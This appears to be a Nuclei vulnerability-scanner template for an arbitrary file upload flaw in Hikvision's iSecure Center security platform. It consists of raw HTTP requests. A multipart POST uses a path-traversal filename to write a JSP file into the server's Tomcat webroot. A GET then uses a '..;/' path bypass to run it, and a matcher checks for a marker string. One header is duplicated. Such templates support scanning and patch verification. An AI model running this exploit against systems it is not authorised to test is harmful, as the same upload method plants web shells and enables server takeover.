id: hikvision-files-upload

info:
  name: 海康威视综合安防管理平台 iSecure Center /api/external/report 任意文件上传
  author: Superhero
  severity: critical
  description: 海康威视综合安防管理平台 iSecure Center /api/external/report存在任意文件上传
  tags: files-upload
  
http:
  - raw:
      - |
        POST /svm/api/external/report HTTP/1.1
        Host: {{Hostname}}
        Content-Type: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36

        ------WebKitFormBoundary9PggsiM755PLa54a
        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
        Content-Type: application/zip

        <%out.print("pboyjnnrfipmplsukdeczudsefxmywe");%>
        ------WebKitFormBoundary9PggsiM755PLa54a--
  - raw:
      - |
        GET /portal/ui/login/..;/..;/new.jsp HTTP/1.1
        Host: {{Hostname}}
        
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'pboyjnnrfipmplsukdeczudsefxmywe'
      - type: status
        status: 
          - 200